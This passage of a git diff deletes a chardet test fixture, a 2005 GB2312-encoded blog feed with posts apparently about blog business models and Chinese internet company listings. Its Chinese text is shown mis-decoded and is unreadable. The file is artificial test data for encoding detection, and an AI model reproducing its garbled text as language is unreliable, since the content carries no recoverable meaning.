    ¼¸ּלַ°£¬÷ֵֽף׃ָׁ¥´ףֽ³»×ֲע¶«־ק£¬³צְ´µִ±÷ע²»ײ×µְִִ¸ש½מ¶¯ֱֻׂ»ֲֿ£¬ֿכֶנֲע649ֱֻ£¬׃ַ£¬ֳִֶנ±ָֿױזµִֽ¿ֱֻ¼¸ֲֿ£¬ֿכֱֻ¼¸¸צּ״±נׂגֻ¼µִ‎׳ײ£¬ײמָחµµ÷ֳֳֳֳֽ÷¢׳׃µִִך¼ֽ£¬־ֹֿׂ´ףׁ§µִִך¼ֽ£¬¿×¼¹₪׳קµִִך¼ֽׂװ¼°½סִך׳װ¼÷µִִך¼ֽ£¬·´ױ‎ׁ¡µִ‎׳ײ¶¼÷ִֽך¼¶ל­ֱֹֻֿ£¬ָ»÷ףָ‎¿יַ®ֲעֶ±ֽךֲ¡£½סּל׃ײָ¥´ףֽ³»×ֲע¶«־ק£¬ֿכֶנְ´¶װׂ»ֲֿ½±£¬»תֶקֻµײ׀½±ֱֻ£¬ׂװ־ׂ¹‎ֽשµִ¾­ׁי£¬־ׂ²ֲ׃¦¸ֳַ®װ×ײ®ְאµִ׀¡½±£¬µָ°ׁ²ֶ±¸ר¹₪׳קָֻװ±ׂ»¶װ£¬÷÷£¬ֱש®°ֻװ×£¬ׂ²²»ײ×ַ¼¸µָ£¬·´ױ‎ײ׀ֱֻ²»´ףµִׂ»¸צ׀¡½±£¬׃ײ¹»׳װ¼÷³װ¼¸ּלµֱִֻ¡£

    -

    ֿכֱֻֿכ£¬´׃ֲע²ֶ±ײֱ½ס²מ²»¶אֽ¶ָכµִ׳‎²»»ב³¬¹‎¶‏®װ×£¬ױגֳ´ֻדְ´׳װ¼÷¶אֹ»¹ַ׃׀µד׀¡װֶֻרµִ£¬ױג´־µִ׀¡½±°ׁ־ׂ¹÷ֲע²ֶ±µִ׃ֽ¹´ֶנְ´ֱֻ£¬ׂװ÷ף׃¦¸ֳ»¹»בָ¥ֵ¼¶³¢װׂ»ֲֿ£¬²»¹‎£¬ׂװ־ׂµִ¸צ׀װ£¬¹ְ¼ֶַָ‎ּל´ע׃ד־וּלֹ¹ֽר£¬²»ֲע¶א¹‎׃ֲע£¬µ«ֵ¼¶ֵצֵצװֶֻר£¬ׂ²ְײָ₪¶א¶א¡£

    -

    ֿ£ֲֽֿ»״¿ֹׂװׂ»¾ײ׀µִ£¬׳װ¼÷²»׃ֳױגֳ´ֵ¬ֱ¦׀ֱ¿א·¶·µִ¹₪׳קֱֻ£¬²»¹‎£¬ױגׁשµִֿ£ֽ׃־ְׂ´ֻµ־ׂל׃ּל·½ׂ¹ּ·£¬ױגֳ־²»׳קׂ²°ױ¡£

    ]]>
    -
    -
    diff --git a/chardet/tests/GB2312/2.blog.westca.com.xml b/chardet/tests/GB2312/2.blog.westca.com.xml deleted file mode 100644 index 92539fb..0000000 --- a/chardet/tests/GB2312/2.blog.westca.com.xml +++ /dev/null @@ -1,320 +0,0 @@ - - - - - Edwinµִֹ­ֱײ׀¡־ - http://blog.westca.com/blog_a/index.html - ׳װ¼÷µִׂ»׀©־ִ׳ײ£¬ֽ¼ֶ¬÷ֽׂ»׀©׃׀׃ֳµִ׳ֱֿ - zh - - hourly - 1 - 2000-01-01T12:00+00:00 - - - - - - - - - - - - ׃׀²ֳ´¸טִ¹»±ָֻ¸ֳִָד¸ּױ׳םִ״£¿ - http://blog.westca.com/blog_a/p_full/49097.html - 2005-12-02T01:46:23Z - Edwin - װ׃־ִ - - ]]> - - - ֿ£ֽ׃כֽ´¿אַָח´ֱֻ×ֿµ ½פֳ - http://blog.westca.com/blog_a/p_full/48641.html - 2005-11-27T22:04:08Z - Edwin - ַוֲ¶ײ®²ט - ֿ£ֽ׃כֽ´¿אַָח´ֱֻ×ֿµ ½פֳ -¾ֽֿסַײֿֿ¢ַ°µִ ׳מ÷ףׂ»¿ ׀ֲֿ¿ױֶר - -־´װרֶֽµִׁ© ִִַַµ״ֱֲֻֿׂ»ׂ¹ -»¹װ׃ּװ¥ַ·סֿס÷¢ּב±ִַׁש¶ׁ¸צׁ©ֽ -¾ֽׁׂװ׳×ׁ¼הֿ§µֳ ־ֹש־ֿ¢ - -װ÷׳׃ײ׀µִִַ¶ה׀¡»¨ ׁׂ½µע׀» -ָ´¹ׂ׳ֵ±שװ ¾§׃¨ּֽ¸ ְֳׁ־±ָ - -¶¬ּלׁׂ¾­ְ´µ½ -´÷ּל»¹»בװ¶ֲנ£¿ - - -¾ֽֿסַײֿֿ¢ַ°µִ ׳מ÷ףׂ»¿ ׀ֲֿ¿ױֶר
    -
    -־´װרֶֽµִׁ© ִִַַµ״ֱֲֻֿׂ»ׂ¹
    -»¹װ׃ּװ¥ַ·סֿס÷¢ּב±ִַׁש¶ׁ¸צׁ©ֽ
    -¾ֽׁׂװ׳×ׁ¼הֿ§µֳ ־ֹש־ֿ¢
    -
    -װ÷׳׃ײ׀µִִַ¶ה׀¡»¨ ׁׂ½µע׀»
    -ָ´¹ׂ׳ֵ±שװ ¾§׃¨ּֽ¸ ְֳׁ־±ָ
    -
    -¶¬ּלׁׂ¾­ְ´µ½
    -´÷ּל»¹»בװ¶ֲנ£¿
    -]]>
    -
    - - ׂא׳׃½££÷²©¿ֽ£÷׃׀ֹּׂµ¼ײµ־׃¯ְִ£½ - http://blog.westca.com/blog_a/p_full/44725.html - 2005-10-18T18:06:35Z - Edwin - ²©¿ֽׁ׀¾¿ - ְ´װ´£÷ֻׁ÷IT - -ָח½ס£¬²©¿ַֽ׳מֱק׀׀µִֽרֲחֿײֿף÷ֽֽרֲח׀׀־×£¬¾ֽֿסׂװַ°µִֽרֲח׃־ֿ·ׂ»ׁשײֻײ¿ָָֹ£¬¶רװµ±½ס¡°ַׁע¾­¼ֳ¡±µִ׀³¡·¨װעֲֿ£¬׃׀ֱֻ׳¢ׂגֱ¦׃׀ֱֶָֻֻר׳װָ»¾ֽ׃׀ֱֹֻּׂµ¼ײµ£¬ֻשׂװ£¬ֿײװµִ²©¿ֽֽרױ¾¶¼װֳ¦׳ֵָ¦ַ®ֹֿ׀£¬ֶהײ׀׳מ¼±ַ׀µִִ×¹‎׃ָ«ַעµׂ»´ף²©¿ֳֵֽ»§¡×¡×²©¿ֽײ׀¹תֱֻ¡£ - -ֻהָ»װ¸ױ¸ױ½ברµִײ׀¹ת´«ֳ½ֽ¶׳ִך»בֹֿ£¬²©¿ֽײ׀¹ת±»ְֶׁ¡־×ײ׀¹ת׳מ¾ֽ¶׳ַ±ֱ¦ֳ½ּו£¬µ«ַױג²¢²»µָ׃²©¿ֽ¾ֽ׃׀ֱֻ׃¯ְִ£½¡£·½׀ֻ¶«װ½׃²ֹ·ֳ±ׂ²³׀ָֿ¡°²©¿ֽײ׀¹תָ±·¦ֳקָ·µִ׃¯ְִ£½¡±¡£µ«ֲַֻםֹֿ»°·זׂ»׳×£÷¡°£¨²©¿ֽײ׀¹ת£©ִ¿ַ°»¹´¦׃װחֶ¿×·¢½׳¶־£¬ײ»׃׀‎°ֽע׃ֳ»§¡£ָח¹׃ֳ»§´ןµ½ֱֻ1000ֽע£¬־ֳַׂ¾ֽ»בֿעֽ¶׳ױֿװ¾ֳקָ·µִ׃¯ְµִִ£½¡£¡±²»ײ×µְ¡°·½´ףֽף¶ש¡±µִױג¾ה»°ַװ־ײ©¿ֽײ׀¹תײֱ½ס»¹ֳ»׃׀ױׂµ½׃¯ְִ£½±ח»₪ִ״»¹ַװ־×־ׂ‎¸¶אµִ·חֿױֽ¶׳׳ק׀ד£¬׳ײ®£¬ױג¾ה»°ֽ¸׳ֵ׃׀µדץטץ־£¬װץֳ´׃׀ֱֻ‎°ֽע׃ֳ»§»¹ֳ»׃׀ֳקָ·µִ׃¯ְִ£½¶רµ±׃ֳ»§‎´ןµ½ֱֻ1000ֽע±¾ֽ׃׀ֱִֻ״£¿´׃ֳ»ּ‎ֻµ¹‎׃¯ְִ£½׃כ׃ֳ»§‎µִ¶א¹ׁ׃׀¹״£¬װֻµ£¬‎°ֽעµִ׃ֳ»§‎ׁׂ¾­²»ֱֹֻ¡£¶רַׂ£¬²©¿ֽ´׃·¢ֶנײֱ½סׁׂ׃׀־וֱשִךײ®¾ֳ£¬´׃׀ֻ¢ײֱ½סׂ²׃׀ֱ½ִךײ®¾ֱֳֻ£¬װ»¥ֱ×ֽרׂװׂ»ָױַ§ְןµִֻ¶ָ·¢ױ¹µִ½סּל£¬ױג¶־±¼ה¼עײ±¿ֹׂװ׃ֲֳ‏³₪ְ´׀־ָ£¬¿ַֹ£¬´׃·¢ֶנµ½׀ֻ¢£¬²©¿ֽױׂµ½ֱֻ׳װ¼÷µִ׃¯ְִ£½ֲנ£¿ֳ»׃׀£¬ׂ»¸צ׀ֻ¢ֱֻ¼¸ִךµִֽרױ¾µ½ֿײװ»¹ֳ»ױׂµ½׃¯ְִ£½£¬־ֿׂכ׃ְװ¶ׂ²ױׂ²»µ½£¬ׂ²׀ם£¬ׁ¹¸ש¶ש¾ֳֽ»׃׀÷ֻֿµִ׃¯ְִ£½£¡ֻשׂװ£¬·½׀ֻ¶«ׂ²²»׃ֳױױׁׁµֱִֻ¡£ - -ֶהµ£¬²©¿ֽֽרױ¾ײֱ½ס»¹ֳ»ױׂµ½׃¯ְִ£½£¬·½׀ֻ¶«ֳַ²»±״־×´ֻ¶ר׀ְ¢£¬ױג²»ֳַַֻµִ´ם£¬ׂ²²»ַ²©¿ֽµִ´ם£¬¶רַ׃ֹ²©¿ֽµִ׀װײ¾צ¶¨ֱֻµִ¡£ - -´«ֽ³ֽרױ¾ַׂװֶהִָ·‏־ס׃ֽרֳסµִ£¬׀ֲ־ֵ¡¢¶ּ׀ֵ¡¢ֻֻׁק¡¢׃יְײֹץײֱ׃־ֿ·µָ¶¼ַ´«ֽ³ֽרױ¾ּב¹©µִִָ£¬¶ר׃כ´«ֽ³ֽרױ¾²»ֽ¬µִַ£¬²©¿ֽֽרױ¾ּב¹©µִ²»ִַָ£¬¶רֶַ½ּ¨¡×¡×ׂ»¸צױ¹¾¡°²¸שֳַ¡±׳װֹם¼ײµµִֶ½ּ¨£¬ֻשׂװ£¬ֽרֳסֳַ¶װ´«ֽ³ֽרױ¾µִׂ×ַףִַָ£¬¶ר¶װ²©¿ֽֽרױ¾µִׂ×ַףַּב¹©ֶ½ּ¨¡£²©¿ֽֽרױ¾ַֽרֳסֳַ°ׁ׳װ¼÷µִִָױ¹¾¸ר±נָֻ¶ר²»ַ±»¶¯µ״½׃±נָֻ£¨ֽרױ¾£©µִִָ£¬ֽרֳסְ´µ½²©¿ַֽ־×ֱֻױ¹¾׳װ¼÷£¬¶ר²»ַ־×ֱֻ±נµִִ¿µִ£¬ָח¹ַ־×ֱֻ±נµִִ¿µִ£¬ֻ¿ֹׂװָ¥ֹֿ¸ק´ףֳֵ»§ֽרױ¾£¬ױג׀©´ףµֳִֵ»§ֽרױ¾ׁׂ¾­׳צµִ÷÷ֱֳֻ£¬ֳ»±״ׂ×װµ½²©¿ְֽ´¡£ֻשׂװ£¬´׃±¾ײֹֻֿµ£¬ֽרֳס¶װ´«ֽ³ֽרױ¾ַֻקָ¡£¬¶ר¶װ²©¿ֽֽרױ¾ָ´ַ¸ר׃ט£¬ֻקָ¡±״׃׀´ת¼£¬¶ר¸ר׃טָ´ֳ»׃׀£¨¼´¹ױגײײ¸ר׃טַ½¨ֱ¢װ²©¿ֽֽרױ¾ּב¹©ֶ½ּ¨µִ»ש´¡ֹֿ£©£¬ױג¾ַֽ²©¿ֽֽרױ¾׃כ´«ֽ³ֽרױ¾µִײקׂײמ±נ£¬ׂ²ַ־ײֳ´²©¿ֽֽרױ¾׀ֻ¢ֱֻ¼¸ִךָװױׂ²»µ½׃¯ְִ£½µִװ­ׂע¡£±ֿ¾¹£¬²©¿ֽµִ÷ֻ׀ִַ׳װ׃ֹ¡¢¸צ׀װ¡¢ױֵׁןׂװ¼°²־׃כ£¬ֻµִקֱָ¦¾ֽװ׃ֶה·ַֹּׂµ»¯£¬¾ֽװ׃ֶה²»¾­°׳°µִױזµ׀װ£¬ֻשׂװ£¬²©¿ֽ´׃¸ש±¾ֹֿ¾ֵֵֽ³גֹּׂµ£¨ֻהָ»ֻ׃׀׳ֵ¾´ףµִֹּׂµ¼ײµ£©£¬¼´¹ֹּׂµ½ר׳₪ֱֻ²©¿ֽױףµ״ׂ²»בֻ®ֱֽ²»·‏µִ¡£ - -ױ‎ׂע־×ָח´ֻ£¬ֻשׂװ־ֳַׂ²»µֳ²»³׀ָֿױגׁשׂ»¸צ²׀¿בµֲִµ£÷ֿײ½סµִ²©¿ֽ־ַֹׂ׳מִ־ׂ‎ַׁעµִֽרױ¾ײ®ׂ»£¬װױג¸צַׁע¼´¾­¼ֳµִִך´ת£¬ִ־ׂ‎´ףײµִַׁע־ֹׂ´ת±ם׳ֵֻ¾׃׀¾´ףµִֹּׂµ¼ײµ£¬µ«ֻµִֹּׂµ¼ײµ½צ½צּוֿײװֶָֻרֹֿ£¬¶רֻµִֶָֻר׃ײ½צ½צּוֿײװֽרֳסֳַµֿײ׳װ¼÷ָֹֻת¼ײµׂװ¼°׃ֹ´ֻ´רְ´µֲִת׳ד¸׀÷ֽ׀יָ¸׀ֹֿ¡£ױגײײֶָֻר÷ֹּֽׂµ¼ײµ²¢²»ִ¶ֿׂײ³ֹֿײµײ׀µִ³®ֶ±£¬»עױֻµ»¹ֳ»ױׂµ½°ֹּׁׂµ¼ײµ׳×±ה³ֹ׃¯ְִ£½µִ·½·¨¡£ׂ²׀ם£¬׃ְװ¶ׂ²ױׂ²»µ½£¬ׂ²׀םױׂµ½ֱֻ£¬µ«ֻׁׂ¾­²»ַ²©¿ֱֻֽ¡£ - -±נָֻֿ²»¶ִדµ«²»ׂ»¶¨װ¸ׂג־×ִדַּֽ®£¬²»ײ×ױגַ²©¿ֽµִ׀ׂװֻ»¹ַ²»׀ׂ£¿ - -
    -ָח½ס£¬²©¿ַֽ׳מֱק׀׀µִֽרֲחֿײֿף÷ֽֽרֲח׀׀־×£¬¾ֽֿסׂװַ°µִֽרֲח׃־ֿ·ׂ»ׁשײֻײ¿ָָֹ£¬¶רװµ±½ס¡°ַׁע¾­¼ֳ¡±µִ׀³¡·¨װעֲֿ£¬׃׀ֱֻ׳¢ׂגֱ¦׃׀ֱֶָֻֻר׳װָ»¾ֽ׃׀ֱֹֻּׂµ¼ײµ£¬ֻשׂװ£¬ֿײװµִ²©¿ֽֽרױ¾¶¼װֳ¦׳ֵָ¦ַ®ֹֿ׀£¬ֶהײ׀׳מ¼±ַ׀µִִ×¹‎׃ָ«ַעµׂ»´ף²©¿ֳֵֽ»§¡×¡×²©¿ֽײ׀¹תֱֻ¡£
    -
    -ֻהָ»װ¸ױ¸ױ½ברµִײ׀¹ת´«ֳ½ֽ¶׳ִך»בֹֿ£¬²©¿ֽײ׀¹ת±»ְֶׁ¡־×ײ׀¹ת׳מ¾ֽ¶׳ַ±ֱ¦ֳ½ּו£¬µ«ַױג²¢²»µָ׃²©¿ֽ¾ֽ׃׀ֱֻ׃¯ְִ£½¡£·½׀ֻ¶«װ½׃²ֹ·ֳ±ׂ²³׀ָֿ¡°²©¿ֽײ׀¹תָ±·¦ֳקָ·µִ׃¯ְִ£½¡±¡£µ«ֲַֻםֹֿ»°·זׂ»׳×£÷¡°£¨²©¿ֽײ׀¹ת£©ִ¿ַ°»¹´¦׃װחֶ¿×·¢½׳¶־£¬ײ»׃׀‎°ֽע׃ֳ»§¡£ָח¹׃ֳ»§´ןµ½ֱֻ1000ֽע£¬־ֳַׂ¾ֽ»בֿעֽ¶׳ױֿװ¾ֳקָ·µִ׃¯ְµִִ£½¡£¡±²»ײ×µְ¡°·½´ףֽף¶ש¡±µִױג¾ה»°ַװ־ײ©¿ֽײ׀¹תײֱ½ס»¹ֳ»׃׀ױׂµ½׃¯ְִ£½±ח»₪ִ״»¹ַװ־×־ׂ‎¸¶אµִ·חֿױֽ¶׳׳ק׀ד£¬׳ײ®£¬ױג¾ה»°ֽ¸׳ֵ׃׀µדץטץ־£¬װץֳ´׃׀ֱֻ‎°ֽע׃ֳ»§»¹ֳ»׃׀ֳקָ·µִ׃¯ְִ£½¶רµ±׃ֳ»§‎´ןµ½ֱֻ1000ֽע±¾ֽ׃׀ֱִֻ״£¿´׃ֳ»ּ‎ֻµ¹‎׃¯ְִ£½׃כ׃ֳ»§‎µִ¶א¹ׁ׃׀¹״£¬װֻµ£¬‎°ֽעµִ׃ֳ»§‎ׁׂ¾­²»ֱֹֻ¡£¶רַׂ£¬²©¿ֽ´׃·¢ֶנײֱ½סׁׂ׃׀־וֱשִךײ®¾ֳ£¬´׃׀ֻ¢ײֱ½סׂ²׃׀ֱ½ִךײ®¾ֱֳֻ£¬װ»¥ֱ×ֽרׂװׂ»ָױַ§ְןµִֻ¶ָ·¢ױ¹µִ½סּל£¬ױג¶־±¼ה¼עײ±¿ֹׂװ׃ֲֳ‏³₪ְ´׀־ָ£¬¿ַֹ£¬´׃·¢ֶנµ½׀ֻ¢£¬²©¿ֽױׂµ½ֱֻ׳װ¼÷µִ׃¯ְִ£½ֲנ£¿ֳ»׃׀£¬ׂ»¸צ׀ֻ¢ֱֻ¼¸ִךµִֽרױ¾µ½ֿײװ»¹ֳ»ױׂµ½׃¯ְִ£½£¬־ֿׂכ׃ְװ¶ׂ²ױׂ²»µ½£¬ׂ²׀ם£¬ׁ¹¸ש¶ש¾ֳֽ»׃׀÷ֻֿµִ׃¯ְִ£½£¡ֻשׂװ£¬·½׀ֻ¶«ׂ²²»׃ֳױױׁׁµֱִֻ¡£
    -
    -ֶהµ£¬²©¿ֽֽרױ¾ײֱ½ס»¹ֳ»ױׂµ½׃¯ְִ£½£¬·½׀ֻ¶«ֳַ²»±״־×´ֻ¶ר׀ְ¢£¬ױג²»ֳַַֻµִ´ם£¬ׂ²²»ַ²©¿ֽµִ´ם£¬¶רַ׃ֹ²©¿ֽµִ׀װײ¾צ¶¨ֱֻµִ¡£
    -
    -´«ֽ³ֽרױ¾ַׂװֶהִָ·‏־ס׃ֽרֳסµִ£¬׀ֲ־ֵ¡¢¶ּ׀ֵ¡¢ֻֻׁק¡¢׃יְײֹץײֱ׃־ֿ·µָ¶¼ַ´«ֽ³ֽרױ¾ּב¹©µִִָ£¬¶ר׃כ´«ֽ³ֽרױ¾²»ֽ¬µִַ£¬²©¿ֽֽרױ¾ּב¹©µִ²»ִַָ£¬¶רֶַ½ּ¨¡×¡×ׂ»¸צױ¹¾¡°²¸שֳַ¡±׳װֹם¼ײµµִֶ½ּ¨£¬ֻשׂװ£¬ֽרֳסֳַ¶װ´«ֽ³ֽרױ¾µִׂ×ַףִַָ£¬¶ר¶װ²©¿ֽֽרױ¾µִׂ×ַףַּב¹©ֶ½ּ¨¡£²©¿ֽֽרױ¾ַֽרֳסֳַ°ׁ׳װ¼÷µִִָױ¹¾¸ר±נָֻ¶ר²»ַ±»¶¯µ״½׃±נָֻ£¨ֽרױ¾£©µִִָ£¬ֽרֳסְ´µ½²©¿ַֽ־×ֱֻױ¹¾׳װ¼÷£¬¶ר²»ַ־×ֱֻ±נµִִ¿µִ£¬ָח¹ַ־×ֱֻ±נµִִ¿µִ£¬ֻ¿ֹׂװָ¥ֹֿ¸ק´ףֳֵ»§ֽרױ¾£¬ױג׀©´ףµֳִֵ»§ֽרױ¾ׁׂ¾­׳צµִ÷÷ֱֳֻ£¬ֳ»±״ׂ×װµ½²©¿ְֽ´¡£ֻשׂװ£¬´׃±¾ײֹֻֿµ£¬ֽרֳס¶װ´«ֽ³ֽרױ¾ַֻקָ¡£¬¶ר¶װ²©¿ֽֽרױ¾ָ´ַ¸ר׃ט£¬ֻקָ¡±״׃׀´ת¼£¬¶ר¸ר׃טָ´ֳ»׃׀£¨¼´¹ױגײײ¸ר׃טַ½¨ֱ¢װ²©¿ֽֽרױ¾ּב¹©ֶ½ּ¨µִ»ש´¡ֹֿ£©£¬ױג¾ַֽ²©¿ֽֽרױ¾׃כ´«ֽ³ֽרױ¾µִײקׂײמ±נ£¬ׂ²ַ־ײֳ´²©¿ֽֽרױ¾׀ֻ¢ֱֻ¼¸ִךָװױׂ²»µ½׃¯ְִ£½µִװ­ׂע¡£±ֿ¾¹£¬²©¿ֽµִ÷ֻ׀ִַ׳װ׃ֹ¡¢¸צ׀װ¡¢ױֵׁןׂװ¼°²־׃כ£¬ֻµִקֱָ¦¾ֽװ׃ֶה·ַֹּׂµ»¯£¬¾ֽװ׃ֶה²»¾­°׳°µִױזµ׀װ£¬ֻשׂװ£¬²©¿ֽ´׃¸ש±¾ֹֿ¾ֵֵֽ³גֹּׂµ£¨ֻהָ»ֻ׃׀׳ֵ¾´ףµִֹּׂµ¼ײµ£©£¬¼´¹ֹּׂµ½ר׳₪ֱֻ²©¿ֽױףµ״ׂ²»בֻ®ֱֽ²»·‏µִ¡£
    -
    -ױ‎ׂע־×ָח´ֻ£¬ֻשׂװ־ֳַׂ²»µֳ²»³׀ָֿױגׁשׂ»¸צ²׀¿בµֲִµ£÷ֿײ½סµִ²©¿ֽ־ַֹׂ׳מִ־ׂ‎ַׁעµִֽרױ¾ײ®ׂ»£¬װױג¸צַׁע¼´¾­¼ֳµִִך´ת£¬ִ־ׂ‎´ףײµִַׁע־ֹׂ´ת±ם׳ֵֻ¾׃׀¾´ףµִֹּׂµ¼ײµ£¬µ«ֻµִֹּׂµ¼ײµ½צ½צּוֿײװֶָֻרֹֿ£¬¶רֻµִֶָֻר׃ײ½צ½צּוֿײװֽרֳסֳַµֿײ׳װ¼÷ָֹֻת¼ײµׂװ¼°׃ֹ´ֻ´רְ´µֲִת׳ד¸׀÷ֽ׀יָ¸׀ֹֿ¡£ױגײײֶָֻר÷ֹּֽׂµ¼ײµ²¢²»ִ¶ֿׂײ³ֹֿײµײ׀µִ³®ֶ±£¬»עױֻµ»¹ֳ»ױׂµ½°ֹּׁׂµ¼ײµ׳×±ה³ֹ׃¯ְִ£½µִ·½·¨¡£ׂ²׀ם£¬׃ְװ¶ׂ²ױׂ²»µ½£¬ׂ²׀םױׂµ½ֱֻ£¬µ«ֻׁׂ¾­²»ַ²©¿ֱֻֽ¡£
    -
    -±נָֻֿ²»¶ִדµ«²»ׂ»¶¨װ¸ׂג־×ִדַּֽ®£¬²»ײ×ױגַ²©¿ֽµִ׀ׂװֻ»¹ַ²»׀ׂ£¿]]>
    -
    - - ײ׀¹ת»¥ֱ×ֽר¾÷¼ֳֵֵַ׃®ְ׳מ¹״¼ (׳×) - http://blog.westca.com/blog_a/p_full/44293.html - 2005-10-13T16:06:29Z - Edwin - ²©¿ֽׁ׀¾¿ - ¡¡¡¡÷׃ִֿ±¨ׂµֽרׁ¶ ִךµִײ׀¹ת»¥ֱ×ֽר½חָָµד²»¶ֿ¡£±±¾©±¼ה8װֲ5ָױֽם11µד40£¬°¶ָװְֳ¹תִֹֻ¹´ן¿ֻ¹ֶֹ±׀³¡ױ‎½¹ֵֶֹֿׂ׀£¬¹ֶֹ±·¢׀׀¼־×27ְֳװ×£¬ֹֿ׀±¼´ׂװ66ְֳװ×µִּר¿ױ¿×ֵּ£¬װ׳ָױµִ½»ׂ׳ײ׀¹ֹ¼׳מ¸װר´ןµ½151.21ְֳװ×£¬ױֵּ׃122.54ְֳװ×£¬ֹֿױֱַֻ354%£¬³ֹ־×ײ׀¹תװִֹֻ¹´ן¿ֹֻֿ׀¹«ֻ¾ײ׀׀ײµ׳מ´ף£¬ׂ²ַ־©ׂ»¹ֹ¼³¬¹‎100ְֳװ×µִ¹«ֻ¾¡£ֻז÷ףֵׁ»¢10ְֳׂװ×¹÷¹ֹ°¢ְן°ֽ°ֽװעֽך³ֱִֹֻ¿ַ°־×ײ¹ײ׀¹ת׳מ´ףµִ»¥ֱ×ֽר²¢¹÷°¸¡£½ָױ£¬±¾±¨¼ַױֱ×ֿµֱֻ°¶ָ¹«ֻ¾£¬¹«ֻ¾׳²ְֳמׁו÷ך¾ִֽ¿ַ°µִָָµד־ּג½׃ֱֻ²ֹ·ֳ¡£ -¡¡¡¡¹״׃Google - -¡¡¡¡¼ַ:°¶ָµִ¾÷ױש¶װײ°ְ¨3ְא£¬¹ת¼¹«ֻ¾ײ׀׳מײ×ֳµִַGoogle£¬Yahoo£¬ִתװץׁשְֶ¼ֳַֻ? - -¡¡¡¡ְמ:־ֳַׂ²»ַ²־ױױְֳ¹ת¹«ֻ¾»עױ±נµִ¹«ֻ¾£¬־ֳַׂױזױ‎ַ־×׃ֳ»§µִ׀טַףְ´·‏־סµִ¡£־ֳַׂ´׃־µ½׃׀µ½ֿײװ±ה³ָֹ«ַע׳מ´ףµִײ׀־ִֽרױ¾£¬־ֳַׂ׳צײ׀־ִֻֻׁקׂ‎ַזµ½ֿײװ£¬²»ִֻµ־ֳַׂ¿½±´±נָֻ£¬¶רַ־ֳַׂױזױ‎׳צµ½ְם½ג׀³¡£¬ְם½ג׃ֳ»§µ½µ׳װױׂ²ֳ´£¬װץֳ´ׁשֲת׳דֳַֻ׀טַף£¬ױגׁש²ִֵ¹»¸÷ֳµִ·¢ױ¹¡£ֻשׂװ־ֳַׂױ¸צ·‏־סµִ¹‎³ַּֽךָ«´׃׃ֳ»§½ַ¶ָ³צ·¢µִׂ»¸צ¹‎³ּ¡£ - -¡¡¡¡¼ַ:Googleַ°¶ָµִ¹ֹ¶«£¬׃׀ָָֻֿ־×ִדֳַײ®¼ה׃׀׳ֵּ״±נ־¢ֳמµִ¹״ֿµ¡£ - -¡¡¡¡ְמ:װ־ׂ¿´ְ´ׂ²ֳ»׃׀ֳִַ´¸´װ׃£¬ׂ»·½ֳזGoogle׳ק־×°¶ָµִׂ»¸צ¹ֹ¶«£¬¸תֶהֻ¹ֹ¶«ׂ»ׁשַׂ»¸צ¹ֹ¶«£¬µ«ֱםֽגׂ»·½ֳזֻ׃ײַ°¶ָµִ¾÷ױש¶װײ£¬ֻׂ²ּב¹©ײ׀־ִֻֻׁקׂ‎ַז£¬ױגֱ½¸צ²דֳז־ֳַׂ»¹ַ·ײµֳ÷¿×µִ¡£¾ַֽ´¦ְםױג¸צ¹״ֿµֹֿ¿ִֹ±ָֽג½חֿכֿףµִׂ×¼עµ¥¡£׳ק־×ׂ»¸צ¹ֹ¶«µִ»°£¬Google¿ֹׂװֻµַׂ»¸צ÷±»¶¯µִ¹ֹ¶«¡£ֻשׂװֻµֻ²¢²»¾­³£¸ת־ֳַׂ־ׂ»׀©ֲַי£¬»עױ½»ֱקׂ»׀©¿´·¨¡£ - -¡¡¡¡¼ַ:µ½ִ¿ַ°־×ײ¹°¶ָ»¹ַֻµ±ָGoogleׂ×÷ֳ¡£ִתָֿ־×£¬¾ּו±םֿײװִִ·½ֳזִ״? - -¡¡¡¡ְמ:»¹ִַַ¾ה»°£¬־ׂ¾ץµֳַ׳¨׳¢¡£ - -¡¡¡¡¼ַ:Googleׂ²÷׳¨׳¢¡£ - -¡¡¡¡ְמ:ֻ׳צׂ»°¶אײײ׃ןׁװׁ½¡£־ׂ¾ֽ׳צׂ»ײײ׃ןׁװ¡£¶רַֻׂ׳צE¡×mail£¬ָֻ¥׳צֻֻׁק£¬»¹׃׀²©¿ֽ²ֳ´µִ£¬ֻװ׳צ÷¶א¶«־ק¡£µ¼ֹֿװׂ»¸צ¸ֻ³ֹ³₪µֱִל׃ע£¬־ׂ¾ץµֳ׳¨׳¢ַ·ַ³£ײ״ׂ×µִ¡£ - -¡¡¡¡¼ַ:׃׀ָֻֻµ°¶ָװׂ»ִךׂװ÷ף½«³¬¹‎Google¡£ - -¡¡¡¡ְמ:ׂע־×־ַֹֿׂ׀¹«ֻ¾£¬־ַׂ²»ִ¹»װ₪²ג־´ְ´µִ£¬־ׂײ»ִֻµֿײװַ²ֳ´ׁש׳׃£¬־ׂײ»ִֻµֲµַ²ֳ´ׁש׳׃£¬ֲµ¾ַֽ°¶ַָָ«ַע׳מ´ףµִײ׀־ִֽרױ¾¡£ - -¡¡¡¡¼ַ:Googleַׂ»¸צ´¿´גµְֳִ¹ת¹«ֻ¾£¬°¶ָµִֹֿ׀¸תֳַַֻװֽ¬ׂ»ֶנֵֹֿֿ? - -¡¡¡¡ְמׁו÷ך:¶װ¡£¾ַֽ־ֳַׂµ½ֱֻ¹ת¼׳±¾׀³¡ױזױ‎µִ׳נײ״¡£ׂװַ°µִײ׀¹ת¹«ֻ¾£¬´ף¼ׂׂ²ֵ׳ֵָ¥ֹֿ׀£¬¿ִַֹד׳מ÷ףׂ»ֻד¹ֹ¼£¬¸תְֳ¹ת¹«ֻ¾ֿא±ָ¶¼ַµֱֻֽ÷¶א£¬¾ַֻֽ­ׂ²ֻµ²»ַו³‏ַ־ײֳ´?ׂע־×ִדײ׀¹תֲפ²תֶ·ׂ²÷ֳ£¬ײ»ׂ×ַײ׀¹תײֶװל£¬ִד¾ֽ׃¦¸ֳ±דֻׂ¡£ָֿ²»¹ִדײֱ¿÷ֳ²»÷ֳ£¬ִדַײ׀¹תײֶװלµִ£¬ֻשׂװִדׂ×±דֻׂ¡£ֳִַ´ױג¸צ¹ֶֹ±ׂ²ַ£¬ִדַײ׀¹תְ´µִ»¥ֱ×ֽר¹«ֻ¾£¬ֻשׂװִדׂ×±דֻׂ¡£ׂװַ°µִ20¶א¼ֹֿׂ׀¹«ֻ¾¸רָֻµִ׃¡ֿף¶¼ַױגׁשµִ¡£ֳִַ´־ׂ¾ץµֳ°¶ָµִֹֿ׀׳צµ½ֱֻװֽ¬ׂ»ֶנֵֹֿֿ¡£ - -¡¡¡¡¼ַ:Google׃׀÷¶אµִַ®£¬ױגַֻ³ֹ¹¦µִ¹״¼ֲנ? - 